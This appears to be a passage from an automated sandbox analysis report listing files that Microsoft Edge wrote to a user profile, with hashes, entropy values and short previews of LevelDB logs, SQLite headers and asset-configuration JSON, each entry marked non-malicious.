                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):315
                                                                                                                                                                                                                                                                              Entropy (8bit):5.20287605502085
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxouST81cNwi23oH+Tcwtp3hBtB2KLl1XfxDhq2PcNwi23oH+Tcwtp3hBWsIF2:RolGZYebp3dFL5VvLZYebp3eFUv
                                                                                                                                                                                                                                                                              MD5:237071781E9BE1CA8B3C1ABD3376CD85
                                                                                                                                                                                                                                                                              SHA1:09C280B2F0BD580CCAF9655A66718577065B7F08
                                                                                                                                                                                                                                                                              SHA-256:77C7BF57D28F442F6F2366797D88791A9DCAF79600289EFEE7067600650D8ABF
                                                                                                                                                                                                                                                                              SHA-512:606B1F750EBB00EC53EDF0575833647F90A250A1101C869646888650DFF06A0911BC0C9552714D6C716B68B32B90DC176B068D164B5BC909DD518EB52A3ADA60
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:17.184 17e0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/20-02:42:17.219 17e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                              Size (bytes):1696115
                                                                                                                                                                                                                                                                              Entropy (8bit):5.040610599315513
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24576:k1f76gGkISshcFdmcOAoPENUpifYP+MbI2T:k1fgAmmE
                                                                                                                                                                                                                                                                              MD5:40C73356F840BD97A9415FF3F3E47CC1
                                                                                                                                                                                                                                                                              SHA1:23AF5AC798250AA10710710148115A0C1D7E8BF6
                                                                                                                                                                                                                                                                              SHA-256:A90AE9B167692264443726BF3C42E2281062F2373078206465AA6AE273E88692
                                                                                                                                                                                                                                                                              SHA-512:49C2834760E9C02F3AC4CB10F76738A1100FBF22506143C9F377A466949C57F3C5DF4DA24796D95EE6899A94590A4D213EC4A31293CF07005AAEBD71D4B529CC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):342
                                                                                                                                                                                                                                                                              Entropy (8bit):5.0662506129907445
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfx/tYVq2PcNwi23oH+Tcwt9Eh1tIFUt8IXfx/jIgZmw+IXfx/XYIkwOcNwi23A:R/tAvLZYeb9Eh16FUt86/jx/+6/X754G
                                                                                                                                                                                                                                                                              MD5:E622219A199FB8B7854773D37B74EF44
                                                                                                                                                                                                                                                                              SHA1:DB84BFBCB3E3F9618DFAE030E27A5DDDD6F40DB7
                                                                                                                                                                                                                                                                              SHA-256:884C58B2AF4AE9B15406DE5932801606763BA6D66F5F6818332056775D9504FD
                                                                                                                                                                                                                                                                              SHA-512:A79752C2A861D3B5CA522AB57FA70F21788CDFCC10706D78ADB560DFF0B3BB14B2FE4A2B73819E965CD5346A4BB9971C22811D9EFC1AF39009B98E1D035F5CAB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:17.133 1020 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/20-02:42:17.135 1020 Recovering log #3.2024/12/20-02:42:17.139 1020 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):342
                                                                                                                                                                                                                                                                              Entropy (8bit):5.0662506129907445
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfx/tYVq2PcNwi23oH+Tcwt9Eh1tIFUt8IXfx/jIgZmw+IXfx/XYIkwOcNwi23A:R/tAvLZYeb9Eh16FUt86/jx/+6/X754G
                                                                                                                                                                                                                                                                              MD5:E622219A199FB8B7854773D37B74EF44
                                                                                                                                                                                                                                                                              SHA1:DB84BFBCB3E3F9618DFAE030E27A5DDDD6F40DB7
                                                                                                                                                                                                                                                                              SHA-256:884C58B2AF4AE9B15406DE5932801606763BA6D66F5F6818332056775D9504FD
                                                                                                                                                                                                                                                                              SHA-512:A79752C2A861D3B5CA522AB57FA70F21788CDFCC10706D78ADB560DFF0B3BB14B2FE4A2B73819E965CD5346A4BB9971C22811D9EFC1AF39009B98E1D035F5CAB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:17.133 1020 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/20-02:42:17.135 1020 Recovering log #3.2024/12/20-02:42:17.139 1020 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                              Entropy (8bit):0.4622876779283167
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuTn:TouQq3qh7z3bY2LNW9WMcUvBuz
                                                                                                                                                                                                                                                                              MD5:30F0ECFD8EA17255267F2E0775AC40EB
                                                                                                                                                                                                                                                                              SHA1:A0D6C6FA2FE52BB49BAF72A4787691FA79D5BF58
                                                                                                                                                                                                                                                                              SHA-256:AEF3760A4D0CB187B4E9876F0A7EDFA4B4F1E0949B58A21A927E55DE17FF74B7
                                                                                                                                                                                                                                                                              SHA-512:180741BDF405FE958B9A85F807C1456E4B40B02BF8FAB03F35CD97E96EFF5BDB27C3521E34D296A6AD531D9200539E45BA51BC19F26F2E7205B74EB5C82B725B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                              MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                              SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                              SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                              SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):351
                                                                                                                                                                                                                                                                              Entropy (8bit):5.21621799189404
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxY7q2PcNwi23oH+TcwtnG2tMsIFUt8IXfxYeZmw+IXfxpcLDkwOcNwi23oH+V:RY7vLZYebn9GFUt86Ye/+6pM54ZYebnB
                                                                                                                                                                                                                                                                              MD5:F46127CF382EF69622411CDDCD24281E
                                                                                                                                                                                                                                                                              SHA1:326A81E11F619A212FA341A4AC619FC09A2B5F41
                                                                                                                                                                                                                                                                              SHA-256:7AB5E219805457E2FED11313A8A11BF12B3FEA05E8ED8B7A54FF39AE3612DC97
                                                                                                                                                                                                                                                                              SHA-512:4729CCB514DF08FAB2926AF82C7558682C05866BD8201413D17570E199842BF017C8BDD69101EEF19D26570C347EC79711F2333C7B29358A5DE27D2451160169
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.736 894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/20-02:42:12.736 894 Recovering log #3.2024/12/20-02:42:12.737 894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):351
                                                                                                                                                                                                                                                                              Entropy (8bit):5.21621799189404
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxY7q2PcNwi23oH+TcwtnG2tMsIFUt8IXfxYeZmw+IXfxpcLDkwOcNwi23oH+V:RY7vLZYebn9GFUt86Ye/+6pM54ZYebnB
                                                                                                                                                                                                                                                                              MD5:F46127CF382EF69622411CDDCD24281E
                                                                                                                                                                                                                                                                              SHA1:326A81E11F619A212FA341A4AC619FC09A2B5F41
                                                                                                                                                                                                                                                                              SHA-256:7AB5E219805457E2FED11313A8A11BF12B3FEA05E8ED8B7A54FF39AE3612DC97
                                                                                                                                                                                                                                                                              SHA-512:4729CCB514DF08FAB2926AF82C7558682C05866BD8201413D17570E199842BF017C8BDD69101EEF19D26570C347EC79711F2333C7B29358A5DE27D2451160169
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.736 894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/20-02:42:12.736 894 Recovering log #3.2024/12/20-02:42:12.737 894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                              Entropy (8bit):0.6133706919549803
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jEKNlzDpqKNlpemL:TO8D4jJ/6Up+gKHcKHN
                                                                                                                                                                                                                                                                              MD5:F6832BED3FE5E5FA43601B3BAC834EDE
                                                                                                                                                                                                                                                                              SHA1:804B8BF51C4055E7546539C7725A3D2E58C6BEBB
                                                                                                                                                                                                                                                                              SHA-256:D4AA11A41F896E4768AD2E67DA5D4A56736F21DEA15C392E11C7CF24A1029D7E
                                                                                                                                                                                                                                                                              SHA-512:909267014744BD0F4DFB59A2842CC39BF4B68650F47304470F641E9AC42B226994B95CEFF8D4172A36DFA0230CE6381D22FACCA935A162E3C2E65F032FC888B0
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):375520
                                                                                                                                                                                                                                                                              Entropy (8bit):5.354106791217515
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:NA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:NFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                              MD5:E7F39870BE54B9E5BF4A26BEFC42FAB2
                                                                                                                                                                                                                                                                              SHA1:D0431A259CE1CAE012C4274891081A67C816E85E
                                                                                                                                                                                                                                                                              SHA-256:D14D3B68ABCA4DDB7F40675BAE467463A2550EB6ABE510B6622B18B82B05A2E3
                                                                                                                                                                                                                                                                              SHA-512:DBDFDE88A3AB388A1C895D305D7A235536D88E026AF5BE1EBC221BE73ED849E58607EF08BD08714D87DA681C22BFEF3688BED26D3B40A3118818421EB6287BF8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1Z.].q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379154140512879..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):317
                                                                                                                                                                                                                                                                              Entropy (8bit):5.120781249137323
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfx9Pus1cNwi23oH+Tcwtk2WwnvB2KLl1Xfx7Cv3+q2PcNwi23oH+Tcwtk2Wwnp:RduWZYebkxwnvFL57CvOvLZYebkxwnQg
                                                                                                                                                                                                                                                                              MD5:BAFECD9D56A8F6ACBA42E88C09E0DBF5
                                                                                                                                                                                                                                                                              SHA1:4660B5C3610981C77F11EF99D29451903910E300
                                                                                                                                                                                                                                                                              SHA-256:E41800DBCAC89E65E628F8983D8F6BB51E8E1E64CBFDDDE86711A2B35F220882
                                                                                                                                                                                                                                                                              SHA-512:6E0CB5F8465CB973C9BE4EA6F74A82BE146986645AEF3A184B14F14758D1CA6040DD180CC880A1F5F401DEFCD8B307BEE903C41BE24823AE38A91F965DFF2F9B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:17.110 2028 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/20-02:42:17.173 2028 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                              Size (bytes):358860
                                                                                                                                                                                                                                                                              Entropy (8bit):5.324615422681383
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rj:C1gAg1zfvb
                                                                                                                                                                                                                                                                              MD5:8C626AFEF59CEEDFFFA6F37E7BFDDB03
                                                                                                                                                                                                                                                                              SHA1:A94A89830BDFA2EBF3076958DE62C6D23DD9A630
                                                                                                                                                                                                                                                                              SHA-256:3F4AAF35BB99808299C2FA55B13DD9964A2FE81626A38509876383CEA983A388
                                                                                                                                                                                                                                                                              SHA-512:90B1B44F88EF043871098088A2DA029553E1B8E5FC8DD3970B81815ECBC869499F7D544C07775C430110350F06437D0A3B576AE3AA441B1CE3CA32B7E2EE937F
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):418
                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                              Encrypted:false
